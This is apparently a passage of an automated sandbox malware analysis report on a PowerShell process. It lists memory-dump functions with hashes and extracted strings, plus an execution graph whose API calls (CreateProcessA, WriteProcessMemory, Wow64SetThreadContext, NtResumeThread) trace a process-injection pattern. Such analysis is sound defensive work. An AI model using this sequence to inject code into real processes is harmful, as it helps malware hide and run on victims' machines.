                                                                                                                                              • Opcode Fuzzy Hash: 06997ab072a1e68a2d244495102f72f431c6dc85738746f860f26236734f52d2
                                                                                                                                              • Instruction Fuzzy Hash: A761A07190D3C59FC707CF68C8945A9BFB1AF16310B1A44DBC490DF263C228AC4AC7A6
                                                                                                                                              Function 04C78D28 Relevance: 4.4, Strings: 3, Instructions: 669COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1755660641.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (Xcq$LR^q$c{m^
                                                                                                                                              • API String ID: 0-2013928681
                                                                                                                                              • Opcode ID: bdfa8630c68ebd359519a3ac1b62eb168fb4226113fc477511955c3c6a6ef37f
                                                                                                                                              • Instruction ID: 9718ae4eba51e96bef8e526f09574f2a280edd357e8572b64032a0807669459f
                                                                                                                                              • Opcode Fuzzy Hash: bdfa8630c68ebd359519a3ac1b62eb168fb4226113fc477511955c3c6a6ef37f
                                                                                                                                              • Instruction Fuzzy Hash: 6A525A34B00218CFEB24DB25C854B6DBBB3BF85308F1581A9D9499B3A5DB31AD85CF91
                                                                                                                                              Function 04C78BC4 Relevance: 4.1, Strings: 3, Instructions: 321COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1755660641.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (Xcq$LR^q$m
                                                                                                                                              • API String ID: 0-1170143275
                                                                                                                                              • Opcode ID: 0a0a151226db92aac33356b7426de1adc670aa9c08b96db8ec81b511f6101cd1
                                                                                                                                              • Instruction ID: 74369e566c46813e5a11fd381ca6cef6cf82ba59230bcb4d279a01044e3ed25b
                                                                                                                                              • Opcode Fuzzy Hash: 0a0a151226db92aac33356b7426de1adc670aa9c08b96db8ec81b511f6101cd1
                                                                                                                                              • Instruction Fuzzy Hash: 2A517C34B003148FDB24DF69D844B9EBBB2EF89304F1181AAE6459B3A5DB71AD41CF91
                                                                                                                                              Function 04C74098 Relevance: .4, Instructions: 371COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1755660641.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bfe33cb3ecfaca14ecdb80544144db300add8cd5f156c182e86fc2e0e6798de6
                                                                                                                                              • Instruction ID: 1dadb35891582d9b478d0befecba23378386dac773c82d7a6be16b13f752623a
                                                                                                                                              • Opcode Fuzzy Hash: bfe33cb3ecfaca14ecdb80544144db300add8cd5f156c182e86fc2e0e6798de6
                                                                                                                                              • Instruction Fuzzy Hash: 1EF14C34A00249DFCB19CF98D584AADBBF2FF88314F298559E805AB365C731ED81CB94
                                                                                                                                              Function 04C73870 Relevance: .3, Instructions: 325COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1755660641.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cf4b6f3b736b536976d35c40d202f6bd3b28328b09fe8e0f80f13f9602745c47
                                                                                                                                              • Instruction ID: 148d2d47421a221a15dcd299240e89c314a2a92c660a5821c6e58f8485d9f537
                                                                                                                                              • Opcode Fuzzy Hash: cf4b6f3b736b536976d35c40d202f6bd3b28328b09fe8e0f80f13f9602745c47
                                                                                                                                              • Instruction Fuzzy Hash: D7D10734A00259EFCB05CFA8D584A9DFBB2FF88310F298559E845AB365C735ED81DB90
                                                                                                                                              Function 04C72FF0 Relevance: .2, Instructions: 246COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1755660641.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a952e4864c0f35c79d7731c154b322ed7e2421e63958329e5e1488a76c6da60f
                                                                                                                                              • Instruction ID: d22e63183d2f7ec0bf0b1e2953f7a13319abd04675d24a6dc0b516cc7d20e27b
                                                                                                                                              • Opcode Fuzzy Hash: a952e4864c0f35c79d7731c154b322ed7e2421e63958329e5e1488a76c6da60f
                                                                                                                                              • Instruction Fuzzy Hash: 92A19B74A006458FCB05CF98C5949BABBF2FF88310B2485A9E955AB365C736FD41CFA0
                                                                                                                                              Function 04C743E1 Relevance: .1, Instructions: 123COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1755660641.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: dcd86f03a824e15ca74cd90e925d20a18cf02a4075f2014d5c6ca67ed188184c
                                                                                                                                              • Instruction ID: 8464f2337ce14fcf8af1b703d80c514ddb332d3301479a337536b8de7d9f26cb
                                                                                                                                              • Opcode Fuzzy Hash: dcd86f03a824e15ca74cd90e925d20a18cf02a4075f2014d5c6ca67ed188184c
                                                                                                                                              • Instruction Fuzzy Hash: CE51C734A00209EFDB05CFA8D584A9DBBB2FF88314F248559E805AB365C771ED82DF90
                                                                                                                                              Function 04C73100 Relevance: .1, Instructions: 107COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1755660641.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 48c1e6186571c09cc4aa988c7fdd62ea72e9e67ea20e2a9634b57ed2ad01eb51
                                                                                                                                              • Instruction ID: d7f88a77e20e62c7c8b2b35a5e6dbe2fa74acb79bf1c626c0e50b2747fef18d0
                                                                                                                                              • Opcode Fuzzy Hash: 48c1e6186571c09cc4aa988c7fdd62ea72e9e67ea20e2a9634b57ed2ad01eb51
                                                                                                                                              • Instruction Fuzzy Hash: A44157B4A005458FCB09CF98C5989BAFBB2FF48310B158699D955AB365C336FD50CFA0
                                                                                                                                              Function 04C74088 Relevance: .1, Instructions: 99COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1755660641.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a6ed0354b9ba15e959fba0f9398a1e98acf1e859257fcc9c590c19d38f57ca48
                                                                                                                                              • Instruction ID: 6217a912c71c02dde413d82d51bf13909ada2c344364b86c2c3e93e2e76f1ee1
                                                                                                                                              • Opcode Fuzzy Hash: a6ed0354b9ba15e959fba0f9398a1e98acf1e859257fcc9c590c19d38f57ca48
                                                                                                                                              • Instruction Fuzzy Hash: 4C411B74A006458FCB14CF9CC9949AEBBF2FF89310B248669E915EB365C331EC41CB94
                                                                                                                                              Function 04C74960 Relevance: .1, Instructions: 86COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1755660641.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cd2f4cd21e87fffc9f24a359b1924c60ff50de38a9c975b4d1f23f284de3e78e
                                                                                                                                              • Instruction ID: eff4f7ba23226bd373271ff93434692ab63a6be4d3091d60895f157470050b37
                                                                                                                                              • Opcode Fuzzy Hash: cd2f4cd21e87fffc9f24a359b1924c60ff50de38a9c975b4d1f23f284de3e78e
                                                                                                                                              • Instruction Fuzzy Hash: 6D311974A001099FCB08CF59C5849AABBF2FF89310B258699E458EB755D731FD81CBA4
                                                                                                                                              Function 04C74500 Relevance: .0, Instructions: 49COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1755660641.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e4f58dd8198e2dab8b2a9b5d6e176be4d740ad99151f7a85f7d3690f7ea20f67
                                                                                                                                              • Instruction ID: 22dcf4822c4b2ce02f33647e78fda8eb150328399900b5b6a8d3bfb3846215a1
                                                                                                                                              • Opcode Fuzzy Hash: e4f58dd8198e2dab8b2a9b5d6e176be4d740ad99151f7a85f7d3690f7ea20f67
                                                                                                                                              • Instruction Fuzzy Hash: 5311C334A40249EFCB45CFA8D884E9DFBB2FF48314F288158E405AB365C771E982DB90
                                                                                                                                              Function 04C7979B Relevance: .0, Instructions: 48COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1755660641.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c37f8d1045af545f0967cf6a9f9d81033660f107edb5e5b1174b86d4d54dfad3
                                                                                                                                              • Instruction ID: 4b1494804fdcfc52bda84bf52c8cef3ed104a407fc1e96146d91ce9a4d724595
                                                                                                                                              • Opcode Fuzzy Hash: c37f8d1045af545f0967cf6a9f9d81033660f107edb5e5b1174b86d4d54dfad3
                                                                                                                                              • Instruction Fuzzy Hash: E3115275A402488FCB04DFA4D850AEDBFB2FF89314F144599E905AB361DB31AC41CF91
                                                                                                                                              Function 04C0D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1754289848.0000000004C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c0d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 973292307b1c10131b5c6e81412b8620f82681ebed7c39bd18b37f57a6e75276
                                                                                                                                              • Instruction ID: 7172336d0155ab9ad2c4c091683cab66fa92e0ef6a965865e925e9cb6b368fb1
                                                                                                                                              • Opcode Fuzzy Hash: 973292307b1c10131b5c6e81412b8620f82681ebed7c39bd18b37f57a6e75276
                                                                                                                                              • Instruction Fuzzy Hash: 00014C6140E3C09ED7128B259894B52BFB4EF53228F1DC1DBD8888F1E3C2699849C772
                                                                                                                                              Function 04C0D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1754289848.0000000004C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c0d000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: dfce83decf95e3e600a6370bb5ce66888b337cf002ab538e1aeb9d5b6376e88a
                                                                                                                                              • Instruction ID: 1f57493bbcf002714f9ae3f6c98c99eba679baf088f0a652af3bf1b859cf9af1
                                                                                                                                              • Opcode Fuzzy Hash: dfce83decf95e3e600a6370bb5ce66888b337cf002ab538e1aeb9d5b6376e88a
                                                                                                                                              • Instruction Fuzzy Hash: D701F7715093009AE7104E66D9C4767BF9DEF41328F1CC529EC4E4A1C6C679E981C6B1
                                                                                                                                              Function 04C797CB Relevance: .0, Instructions: 25COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1755660641.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: de38cd336340776e27bc954a939f03f53d10dbc7efc1cafae8a7c29c13a3fa51
                                                                                                                                              • Instruction ID: 09884f8a9eb1e0baf31bab783d25729ad6063c38f0d05ef2ff97a2646a4b70c7
                                                                                                                                              • Opcode Fuzzy Hash: de38cd336340776e27bc954a939f03f53d10dbc7efc1cafae8a7c29c13a3fa51
                                                                                                                                              • Instruction Fuzzy Hash: D2E0EDB4D1820A9FCF48DFB994425FEBFF1AB08200F1086AFD829E7314E63806018F95
                                                                                                                                              Function 04C797D8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1755660641.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: be9b5ca52dfd43dcb22877d0437667904c67ea9b20dd08bbc475da447ff9f143
                                                                                                                                              • Instruction ID: 02a9c537de442dea8186fc273195e41373223cb273e2f6047bcfa7412e12d0a9
                                                                                                                                              • Opcode Fuzzy Hash: be9b5ca52dfd43dcb22877d0437667904c67ea9b20dd08bbc475da447ff9f143
                                                                                                                                              • Instruction Fuzzy Hash: 80E026B4E1430E9F9F48DFB995425BEFBF5AB48200F10856E9819E3340E63856518FE5

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:2.7%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:32.1%
                                                                                                                                              Total number of Nodes:81
                                                                                                                                              Total number of Limit Nodes:9
                                                                                                                                              execution_graph 60843 7800d50 60844 7800d57 Wow64SetThreadContext 60843->60844 60846 7800ddd 60844->60846 60847 7800650 60848 78006b4 CreateProcessA 60847->60848 60850 780083c 60848->60850 60851 78015e0 60852 7801628 WriteProcessMemory 60851->60852 60854 780167f 60852->60854 60855 7802068 60856 78020b0 NtResumeThread 60855->60856 60858 78020e5 60856->60858 60859 7758b5e 60860 7758b62 60859->60860 60861 7758cfb 60860->60861 60867 7527158 60860->60867 60871 7526ce8 60860->60871 60876 7526cda 60860->60876 60881 75270fc 60860->60881 60885 7526fef 60860->60885 60868 75271a3 WriteProcessMemory 60867->60868 60870 75271f4 60868->60870 60870->60861 60875 7526d20 60871->60875 60872 75271b9 WriteProcessMemory 60873 75271f4 60872->60873 60873->60861 60874 7526d76 60874->60861 60875->60872 60875->60874 60880 7526ce5 60876->60880 60877 75271b9 WriteProcessMemory 60878 75271f4 60877->60878 60878->60861 60879 7526d76 60879->60861 60880->60877 60880->60879 60882 7527056 WriteProcessMemory 60881->60882 60884 75271f4 60882->60884 60884->60861 60888 7526f4d 60885->60888 60886 75271b9 WriteProcessMemory 60887 75271f4 60886->60887 60887->60861 60888->60885 60888->60886 60889 7758bd8 60890 7758bf0 60889->60890 60891 7758cfb 60890->60891 60892 7526cda WriteProcessMemory 60890->60892 60893 7526ce8 WriteProcessMemory 60890->60893 60894 7527158 WriteProcessMemory 60890->60894 60895 7526fef WriteProcessMemory 60890->60895 60896 75270fc WriteProcessMemory 60890->60896 60892->60891 60893->60891 60894->60891 60895->60891 60896->60891 60897 77fa410 60898 77fa413 60897->60898 60903 77fa691 60898->60903 60911 77fa440 60898->60911 60919 77fa450 60898->60919 60899 77fa43b 60904 77fa4a5 60903->60904 60905 77fa6fe 60904->60905 60906 77fa4ca 60904->60906 60907 77fa4ff 60904->60907 60910 77fa910 2 API calls 60905->60910 60906->60899 60907->60906 60927 77fa910 60907->60927 60908 77fa755 60908->60899 60910->60908 60914 77fa44c 60911->60914 60912 77fa6fe 60918 77fa910 2 API calls 60912->60918 60913 77fa4ca 60913->60899 60914->60912 60914->60913 60915 77fa4ff 60914->60915 60915->60913 60917 77fa910 2 API calls 60915->60917 60916 77fa755 60916->60899 60917->60915 60918->60916 60920 77fa453 60919->60920 60921 77fa4ca 60920->60921 60922 77fa4ff 60920->60922 60923 77fa6fe 60920->60923 60921->60899 60922->60921 60926 77fa910 2 API calls 60922->60926 60925 77fa910 2 API calls 60923->60925 60924 77fa755 60924->60899 60925->60924 60926->60922 60928 77fa91a 60927->60928 60929 77fa94e 60928->60929 60931 77fb91a 60928->60931 60929->60907 60932 77faa7f 60931->60932 60933 77fbcbc 60931->60933 60937 77ffc6c 60933->60937 60941 77ffc78 60933->60941 60938 77ffc70 CreateFileA 60937->60938 60940 77ffd73 60938->60940 60942 77ffc7b CreateFileA 60941->60942 60944 77ffd73 60942->60944

                                                                                                                                              Executed Functions

                                                                                                                                              Function 07801C54 Relevance: 2.6, APIs: 1, Instructions: 1067nativethreadCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2887 7801c54-78020e3 NtResumeThread 2894 78020e5-78020eb 2887->2894 2895 78020ec-7802111 2887->2895 2894->2895
                                                                                                                                              APIs
                                                                                                                                              • NtResumeThread.NTDLL(?,?), ref: 078020D6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721987485.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ResumeThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                              • Opcode ID: 92c1953e169db030fd8d25c4fa10d1da7057c7ffe054a06596b9cf325a6c45ab
                                                                                                                                              • Instruction ID: fd0b714fd95ee768b91ba69ce3c73268518b24f63a54302071f977f72e65a366
                                                                                                                                              • Opcode Fuzzy Hash: 92c1953e169db030fd8d25c4fa10d1da7057c7ffe054a06596b9cf325a6c45ab
                                                                                                                                              • Instruction Fuzzy Hash: B921A2B1D083888FCB11DFADC8546DEFFF4AF4A224F14845ED098AB252C6749549CBA5
                                                                                                                                              Function 07802068 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • NtResumeThread.NTDLL(?,?), ref: 078020D6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721987485.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ResumeThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                              • Opcode ID: 651609ffb622df9d46adfa1541eb646a97d525e71867ad9a7cd45f73b79d2fc4
                                                                                                                                              • Instruction ID: 2750084876c530171a617e56cfcca07de1026febde98d0ef663ccabcba4af144
                                                                                                                                              • Opcode Fuzzy Hash: 651609ffb622df9d46adfa1541eb646a97d525e71867ad9a7cd45f73b79d2fc4
                                                                                                                                              • Instruction Fuzzy Hash: 2A1106B1D003098FDB10DFAAC84479EFBF4FB48320F50842AD459A7250CB74A945CFA5
                                                                                                                                              Function 077FC73F Relevance: 1.5, Strings: 1, Instructions: 288COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721872316.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: PH^q
                                                                                                                                              • API String ID: 0-2549759414
                                                                                                                                              • Opcode ID: e8f162785b027fd1ec424c62490ea3744ecf98526fb4ca75bd38f93a22e323d3
                                                                                                                                              • Instruction ID: 4a2d6c0c69053dad8da016e688cd24cca20fefb1a0db61154cefc497484bf37c
                                                                                                                                              • Opcode Fuzzy Hash: e8f162785b027fd1ec424c62490ea3744ecf98526fb4ca75bd38f93a22e323d3
                                                                                                                                              • Instruction Fuzzy Hash: B4D137B8E0521CCFDB25CFA9C944B9DBBF2BB49340F1081A9C109AB355DB785988CF61
                                                                                                                                              Function 077FA440 Relevance: .2, Instructions: 215COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721872316.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fe568b27f74a66cfcfc1c4c2b3f5c8c72fee31c8db50e97c9782078474da274c
                                                                                                                                              • Instruction ID: 41bbca9cac0d5a5b8c98e19bc66337c92251bf0fd338f73df1ba2a6b247738b1
                                                                                                                                              • Opcode Fuzzy Hash: fe568b27f74a66cfcfc1c4c2b3f5c8c72fee31c8db50e97c9782078474da274c
                                                                                                                                              • Instruction Fuzzy Hash: 519124B8A15218CFDB14DFA9D548BADB7F2FF8A340F118169D109AB391DB349886CF50
                                                                                                                                              Function 077FA450 Relevance: .2, Instructions: 211COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721872316.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e3f29e69b35fe645c320672d73a80c7539da01efec1efdb1b979cbce1d8dc029
                                                                                                                                              • Instruction ID: 74a213f38555167e2595b933c7a3d0f0f1ff072f621d01b7c8068e33e636818f
                                                                                                                                              • Opcode Fuzzy Hash: e3f29e69b35fe645c320672d73a80c7539da01efec1efdb1b979cbce1d8dc029
                                                                                                                                              • Instruction Fuzzy Hash: A68133B4A14218CFDB14DFA8D548BADB7F6FF8A340F118169D209AB391DB349885CF50
                                                                                                                                              Function 077FA691 Relevance: .2, Instructions: 184COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721872316.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3baf05245558751f87d15c81f91b000bbbf31c76930b9438fbce6f7a7699c7b9
                                                                                                                                              • Instruction ID: 476eb0d2da467dc047cff4a5210f79c8d226296e42f5566b964b75c5903ecf7a
                                                                                                                                              • Opcode Fuzzy Hash: 3baf05245558751f87d15c81f91b000bbbf31c76930b9438fbce6f7a7699c7b9
                                                                                                                                              • Instruction Fuzzy Hash: D27134B8A01218CFDB14DFA8D544BADB7F2FF8A340F10816AD209AB350DB349886CF50
                                                                                                                                              Function 07BF78D0 Relevance: 31.4, Strings: 24, Instructions: 1417COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $ai$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$x.~h$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                              • API String ID: 0-3590733573
                                                                                                                                              • Opcode ID: 8da19e87c05fa47ef525c38596e212c246a400b0c903984b0b121aecda1e4356
                                                                                                                                              • Instruction ID: a8458f6d55f76948adcb473f244fedb75c8ccab383dea8b25f12db9d40757ffb
                                                                                                                                              • Opcode Fuzzy Hash: 8da19e87c05fa47ef525c38596e212c246a400b0c903984b0b121aecda1e4356
                                                                                                                                              • Instruction Fuzzy Hash: 5BB2F8F0B00205DFEB14CF68C944A6ABBE6EF85B10F54C4AAD605DB355DB32D849CB91
                                                                                                                                              Function 07BF66E0 Relevance: 25.7, Strings: 20, Instructions: 700COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                              • API String ID: 0-2087719723
                                                                                                                                              • Opcode ID: a513657a14a6af921d9c49a707ceeeb30c7a42bee649d0393164a811fbcfa74f
                                                                                                                                              • Instruction ID: eb3289f660f1038bac12d98db60f2da08312064549771bb92aa39ff8d7e420a9
                                                                                                                                              • Opcode Fuzzy Hash: a513657a14a6af921d9c49a707ceeeb30c7a42bee649d0393164a811fbcfa74f
                                                                                                                                              • Instruction Fuzzy Hash: 6F322BF170020ADFEB148F68C94476A7BA1EF85B18F1484EAEE458F291DB31DC49C7A1
                                                                                                                                              Function 07BF1828 Relevance: 22.3, Strings: 17, Instructions: 1081COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
